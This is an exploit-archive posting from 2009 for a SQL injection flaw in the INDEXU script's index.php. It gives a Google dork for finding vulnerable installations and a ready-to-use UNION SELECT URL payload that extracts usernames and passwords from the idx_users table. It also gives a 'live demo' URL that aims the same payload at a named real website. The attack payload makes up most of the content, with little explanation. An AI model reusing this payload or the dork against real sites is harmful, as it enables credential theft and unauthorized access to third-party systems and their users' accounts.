Topic : | INDEXU (index.php id) SQL Injection Vulnerability
|
ExploitAlert : 6548
Credit : S4s-T3rr0r!sT
Date : 09.07.2009
Download
Plain text version
 Exploit Code : ***************************************************************************
***
# Title : INDEXU (index.php id) SQL Injection
# S.Page : http://www.nicecoder.com/
# Author : S4s-T3rr0r!sT
# Contact : S4s@n2m3.com / l3t@hotmail.com
# Site : WwW.HacKTeacH.OrG
***************************************************************************
****
D0rk : Powered by INDEXU
Exploit :
#
http://localhost/index.php?mall=-20023+union+select+1,2,3,4,5,6,7,8,9,10,11
,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61
,62,63,64,65,66,concat(username,0x3e,password),68,69,70,71,72,73,74,75,76,7
8,79,80+from+idx_users--
l1v3 D3m0 :
#
http://www.the7dollarmall.com/index.php?mall=-20023+union+select+1,2,3,4,5,
6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3
2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
7,58,59,60,61,62,63,64,65,66,concat(username,0x3e,password),68,69,70,71,72,
73,74,75,76,78,concat(username,0x3e,password),80+from+idx_users--
V!V4 P4L3ST1N3
................................................Done!
Thanx To : Cold Z3ro , HcJ , ViRuSMaN , PЯӨVIDӨЯ ,
Red D3v1l , Rov3r-3x3 ,AlQaYsEr , And GaZa Fighters
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|